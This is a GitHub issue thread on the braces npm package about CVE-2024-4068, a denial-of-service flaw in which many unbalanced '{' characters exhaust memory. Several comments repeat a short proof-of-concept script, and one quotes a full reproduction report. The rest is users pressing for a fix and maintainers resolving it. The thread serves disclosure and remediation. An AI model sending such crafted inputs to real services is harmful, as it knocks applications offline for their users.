Braces is marked as DoS vulnerable via Memory Exhaustion by Blackduck about braces HOT 23 CLOSED

Current code right now will throw from code in the repository:

for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 

with:

Testing with 1 repeats...
/Users/coderaiser/braces/lib/parse.js:39
    throw new SyntaxError(`Input length (${input.length}), exceeds max characters (${max})`);
    ^

SyntaxError: Input length (90000), exceeds max characters (65536)

Anyways if we decrease repeats multiplier to 9000 it will crash node.js:

Regex executed in 1.643s.

Testing with 3 repeats...

<--- Last few GCs --->

[79448:0x128008000]     9091 ms: Scavenge 3643.7 (4107.5) -> 3643.7 (4107.5) MB, pooled: 939 MB, 9.21 / 0.00 ms  (average mu = 0.129, current mu = 0.081) allocation failure; 

Possible solution, as mentioned @cichelero would be to limit count of unique symbols with an option maxSymbols: 2092bd1#diff-97a844a3a73131d1102031801050b31c823b42a40b8cdcf84b693ebb14463149

In this case we will se:

Testing with 1 repeats...
/Users/coderaiser/braces/lib/validate-input.js:10
        throw SyntaxError(`To many symbols '${value}'. Maximum: ${maxSymbols} allowed. Received: ${count}`);
        ^

SyntaxError: To many symbols '{'. Maximum: 1024 allowed. Received: 9000
    at module.exports.validateInput (/Users/coderaiser/braces/lib/validate-input.js:10:15)
    at parse (/Users/coderaiser/braces/lib/parse.js:40:3)

It can be override with an option according to user needs, but can have reasonable defaults.

from braces.

Same here. Waiting for a solution.

from braces.

I have the same issue - my builds are being blocked by Blackduck due to this vulnerability.

from braces.

PoC:

const braces = require('braces');
const maxRepeats = 1;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 

from braces.

Some refs:
https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727
https://learn.snyk.io/lesson/redos

from braces.

That's not enough information to provide a useful response. Please provide a detailed explanation of the vulnerability, and examples of how it would be exploited.

from braces.

That's fair. But I don't think the information is public accessible. Here is the quote from the report:

Technical Description
The flaw occurs in the parse function of the parse.js file. There is no limitation on the number of "imbalanced braces" processed. This allows a crafted input consisting of many { braces to cause the parser to enter a loop and continuously allocate heap memory without freeing any. Eventually a large enough input of these braces will cause an application crash via memory exhaustion.

There is a link to checkmarx. But the link is also gated.

from braces.

We'll respond once you or someone else is willing to provide the information I requested above. A link to another source doesn't answer my question.

That said, if you are allowing your users to submit regular expressions in a web form (brace patterns compile to regular expressions as is explained in several places in the readme), and you are using those regular expressions to perform operations on your server, you might have bigger problems than this library.

There is no way to guarantee that users will create safe regular expressions, even if we check "star height". See https://en.wikipedia.org/wiki/Star_height_problem.

from braces.

https://www.cve.org/CVERecord?id=CVE-2024-4068

from braces.

https://devhub.checkmarx.com/cve-details/CVE-2024-4068/

from braces.

@jonschlinkert please find more details+steps (kudos to Mário Teixeira)
Link

Summary
The NPM package micromatch is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything, which can cause the application to hang or slow down. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to its greedy matching.

Product
This vulnerability affects all versions of the NPM package micromatch.

Impact
This vulnerability can cause the application to hang or slow down, resulting in a Denial of Service.

Steps To Reproduce
Install micromatch with “npm”:
npm install --save micromatch

Create a poc.js file with the following code:
const { braces } = require('micromatch');

console.log("Executing payloads...");

const maxRepeats = 10;

for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 
Execute the proof-of-concept file with node poc.js.
Expected Result:
When executing the proof-of-concept, observe how the response becomes slower on each iteration. If you change the braces { on the payload variable to another character, such as a, the script should execute immediately.

Remediation
A [fix was merged](https://github.com/micromatch/micromatch/commit/81e4d93b2c7a32d290337c0b2a2102e1b584b423) in the pattern matching. However, further testing shows the issue still persists.

from braces.

Hello all our releases are blocked by this. Can you please help us here @jonschlinkert ?

from braces.

Same issue

from braces.

Same issue too

from braces.

Same issue here as well. Everything is blocked by this issue. Can you please help us, @jonschlinkert ?

from braces.

Looks like braces not maintained at all, better to use glob, if you use fast-glob, or globby.

from braces.

braces it's used as a Transitive Dependency of http-proxy-middleware

from braces.

Any update on this? I see there are two PRs for fixes out there.

from braces.

3.0.3 is coming this weekend.

@paulmillr Was 3.0.3 released?

from braces.

+1 to that. I see the fix is merged but I don't see any new version available in NPM.

from braces.

Read this #37 (comment)

from braces.

sorry didn't mean to close this, hit enter when I thought it was focused on something else. but I'll keep it locked.

from braces.

Resolved by #40

from braces.